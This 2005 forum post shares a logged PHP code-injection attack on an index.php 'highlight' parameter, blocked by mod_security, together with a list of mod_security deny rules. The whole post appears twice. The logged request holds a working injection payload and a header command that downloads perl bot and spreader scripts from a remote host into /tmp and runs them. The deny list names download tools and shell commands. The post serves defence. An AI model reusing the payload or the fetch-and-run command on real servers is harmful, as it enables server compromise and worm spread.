BornOnline
08-05-2005, 05:06 PM
Geez.. just make sure you have "system" disabled in php.ini at least.
Been seeing this for the last two days... interesting stuff
GET /index.php?Operation=ItemLookup&ItemId=VTC&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Accept: */*
Host: *****.com
PHP: cd /tmp; lynx -source http://home.*.*/~user/b4clone > b4clone.pl; perl b4clone.pl; lynx -source http://home.*.*/~user/spreader > s.pl;$
User-Agent: Mozilla/4.0
mod_security-message: Access denied with code 403. Pattern match "system\(" at THE_REQUEST.
mod_security-action: 403
Using this in mod_sec
SecFilterSelective THE_REQUEST "system\("
SecFilterSelective THE_REQUEST "passthru\("
SecFilter "wget\x20"
SecFilter "uname\x20-a"
SecFilterSelective THE_REQUEST "/bin/ls"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilter "conf/httpd\.conf"
SecFilterSelective THE_REQUEST "///"
SecFilter "cd[[:space:]]/tmp"
SecFilter "cd[[:space:]]/var/tmp"
SecFilter "cd[[:space:]]/dev/shm"
SecFilter "gcc\x20-o"
SecFilter "cc\x20"
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
#SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
#SecFilterSelective THE_REQUEST "cvs "
#SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
Been seeing this for the last two days... interesting stuff
GET /index.php?Operation=ItemLookup&ItemId=VTC&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Accept: */*
Host: *****.com
PHP: cd /tmp; lynx -source http://home.*.*/~user/b4clone > b4clone.pl; perl b4clone.pl; lynx -source http://home.*.*/~user/spreader > s.pl;$
User-Agent: Mozilla/4.0
mod_security-message: Access denied with code 403. Pattern match "system\(" at THE_REQUEST.
mod_security-action: 403
Using this in mod_sec
SecFilterSelective THE_REQUEST "system\("
SecFilterSelective THE_REQUEST "passthru\("
SecFilter "wget\x20"
SecFilter "uname\x20-a"
SecFilterSelective THE_REQUEST "/bin/ls"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilter "conf/httpd\.conf"
SecFilterSelective THE_REQUEST "///"
SecFilter "cd[[:space:]]/tmp"
SecFilter "cd[[:space:]]/var/tmp"
SecFilter "cd[[:space:]]/dev/shm"
SecFilter "gcc\x20-o"
SecFilter "cc\x20"
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
#SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
#SecFilterSelective THE_REQUEST "cvs "
#SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "